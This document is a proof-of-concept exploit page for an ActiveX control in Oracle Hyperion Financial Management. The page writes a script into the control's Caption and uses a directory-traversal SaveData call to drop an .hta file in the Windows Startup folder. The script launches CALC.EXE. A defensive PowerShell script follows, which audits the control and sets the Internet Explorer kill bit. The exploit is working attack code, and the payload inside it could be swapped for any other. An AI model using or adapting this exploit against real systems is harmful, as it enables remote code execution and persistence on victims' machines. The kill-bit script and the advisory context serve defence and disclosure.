<!--
Oracle Hyperion Financial Management 11.1.2.1.0
TList6.ocx ActiveX Control Remote Code Execution Vulnerability PoC

Tested against Internet Explorer 8 on
Microsoft Windows 2003 R2 SP2

Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<html>
<object classid='clsid:65996200-3B87-11D4-A21F-00E029189826' id='obj'>
</object>
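<script>
// Caption is set to markup that contains a script block; the PoC's payload only launches CALC.EXE.
obj.Caption = ">>>>>>>>>>>>>>>>><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
// SaveData() is passed a directory-traversal path, so the output is an .hta in the All Users Startup folder.
obj.SaveData("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\suntzu.hta");
</script>
</html>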
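
A defensive counterpart to the PoC above, added here and not part of the original advisory: a PowerShell script that reports whether the control with the CLSID from the header is registered and marked safe for scripting or initialization, and optionally sets the Internet Explorer kill bit for it. The `-Apply` switch and the output wording are this example's own; the registry locations and category IDs are the standard Windows ones.

```powershell
# Added example: audit and kill-bit the TList6 control named in the PoC header.
# Run from an elevated prompt. -Apply is this script's own (hypothetical) switch.
param([switch]$Apply)

$Clsid   = '{65996200-3B87-11D4-A21F-00E029189826}'   # CLSID from the PoC header
$KillBit = 0x00000400                                  # "Compatibility Flags" kill bit
# Standard component categories that let IE script or initialize a control.
$SafeCats = @{
    '{7DD95801-9882-11CF-9FA9-00AA006C4A20}' = 'Safe for Scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C4A20}' = 'Safe for Initialization'
}
# Native registry view, plus the 32-bit view on 64-bit Windows.
$Roots = @('HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node') | Where-Object { Test-Path $_ }

foreach ($root in $Roots) {
    $clsKey = "$root\Classes\CLSID\$Clsid"
    if (-not (Test-Path $clsKey)) {
        Write-Output "[$root] control not registered"
        continue
    }
    $server = (Get-ItemProperty "$clsKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    Write-Output "[$root] registered, binary: $server"
    foreach ($cat in $SafeCats.Keys) {
        if (Test-Path "$clsKey\Implemented Categories\$cat") {
            Write-Output "[$root]   marked $($SafeCats[$cat])"
        }
    }

    # The kill bit lives under the IE "ActiveX Compatibility" key for the CLSID.
    $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags  = (Get-ItemProperty $compat -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($flags -band $KillBit) {
        Write-Output "[$root]   kill bit already set"
    } elseif ($Apply) {
        if (-not (Test-Path $compat)) { New-Item -Path $compat -Force | Out-Null }
        # Preserve any existing flags and add the kill bit.
        Set-ItemProperty -Path $compat -Name 'Compatibility Flags' -Value ([int]$flags -bor $KillBit) -Type DWord
        Write-Output "[$root]   kill bit set"
    } else {
        Write-Output "[$root]   kill bit NOT set (re-run with -Apply to set it)"
    }
}
```

Setting the kill bit stops Internet Explorer from instantiating the control at all, including on pages that legitimately rely on it.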